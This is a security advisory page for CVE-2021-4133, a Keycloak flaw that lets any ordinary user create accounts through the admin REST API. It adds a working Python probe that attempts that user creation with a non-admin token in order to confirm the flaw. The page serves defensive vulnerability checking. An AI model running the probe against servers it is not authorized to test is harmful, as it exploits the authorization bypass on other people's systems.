CVE-2021-4133 – org.keycloak:keycloak-services
Package
Manager: maven
Name: org.keycloak:keycloak-services
Vulnerable Version: >=0 <15.1.1
Severity
Level: High
CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
EPSS: 0.00263 (percentile 0.49493)
Details
Improper Authorization in Keycloak. An incorrect authorization flaw was found in Keycloak 12.0.0: it allows an attacker with any existing user account to create new default user accounts via the administrative REST API, even where new user registration is disabled.
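The practical check for this advisory is whether a token belonging to an ordinary realm user (no admin roles) is accepted by the user-creation endpoint of the admin REST API. The probe below is an added example written for this page, not code from the advisory or the Keycloak project. It assumes the standard Keycloak paths (the realm token endpoint at /realms/{realm}/protocol/openid-connect/token and user creation at POST /admin/realms/{realm}/users), that the per-realm admin-cli public client accepts the password grant, and that BASE_URL includes the /auth context path on the WildFly-based distributions that the affected versions shipped as; the realm name, account and probe username are placeholders. A fixed server answers 403; a 201 means the user was created with a non-admin token.

```python
"""Probe for CVE-2021-4133: can a non-admin realm user create users via the admin REST API?

Added example; the URL layout and client id below are assumptions about a standard
Keycloak deployment, not details taken from the advisory.
"""
import json
import urllib.error
import urllib.parse
import urllib.request

VULNERABLE = "VULNERABLE"
NOT_VULNERABLE = "NOT_VULNERABLE"
INCONCLUSIVE = "INCONCLUSIVE"


def _urllib_transport(method, url, body, headers):
    """Real HTTP transport: returns (status, response_headers, response_body)."""
    req = urllib.request.Request(url, data=body, method=method, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.status, dict(resp.headers), resp.read()
    except urllib.error.HTTPError as err:
        return err.code, dict(err.headers), err.read()


def password_grant(base_url, realm, username, password, client_id="admin-cli",
                   transport=_urllib_transport):
    """Obtain an access token for an ordinary user with the password grant (assumed enabled)."""
    url = f"{base_url}/realms/{realm}/protocol/openid-connect/token"
    form = urllib.parse.urlencode({
        "grant_type": "password",
        "client_id": client_id,
        "username": username,
        "password": password,
    }).encode()
    status, _, body = transport("POST", url, form,
                                {"Content-Type": "application/x-www-form-urlencoded"})
    if status != 200:
        raise RuntimeError(f"token endpoint returned {status}: {body[:200]!r}")
    return json.loads(body)["access_token"]


def build_create_user_request(base_url, realm, new_username):
    """URL and body for the admin API's user-creation endpoint.

    The account is created disabled so that a successful probe leaves nothing usable behind.
    """
    url = f"{base_url}/admin/realms/{realm}/users"
    representation = {"username": new_username, "enabled": False}
    return url, json.dumps(representation).encode()


def classify(status):
    """Map the admin API's status code to a verdict."""
    if status == 201:
        return VULNERABLE        # user created with a non-admin token
    if status == 403:
        return NOT_VULNERABLE    # authorization enforced, the fixed behaviour
    return INCONCLUSIVE          # 401 bad token, 404 wrong path, 409 name taken, ...


def probe(base_url, realm, token, new_username, transport=_urllib_transport):
    """Attempt the create-user call with the supplied token and report the outcome."""
    url, body = build_create_user_request(base_url, realm, new_username)
    status, headers, _ = transport("POST", url, body, {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json",
    })
    # On 201 the Location header names the created user; remove it afterwards with a
    # real admin account. The probe stops here and does not try any further actions.
    lowered = {k.lower(): v for k, v in headers.items()}
    return {"status": status, "verdict": classify(status),
            "location": lowered.get("location")}


if __name__ == "__main__":
    import sys
    # usage: probe.py BASE_URL REALM USERNAME PASSWORD   (e.g. https://sso.example.test/auth demo alice ...)
    base_url, realm, user, pw = sys.argv[1:5]
    tok = password_grant(base_url, realm, user, pw)
    print(probe(base_url, realm, tok, "cve-2021-4133-probe"))
```

Run it with the credentials of a plain, non-admin account in the realm under test; registration being disabled in the realm is exactly the condition the advisory says this bypasses, so the probe is meaningful regardless of that setting. Treat any verdict other than NOT_VULNERABLE on a version below 15.1.1 as confirmation to upgrade, and delete the probe user if one was created.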
Metadata
Created: 2022-01-06T18:32:58Z
Modified: 2022-02-02T16:07:18Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-83x4-9cwr-5487/GHSA-83x4-9cwr-5487.json
CWE IDs: ["CWE-863"]
Alternative ID: GHSA-83x4-9cwr-5487
Finding: F006
Auto approve: 1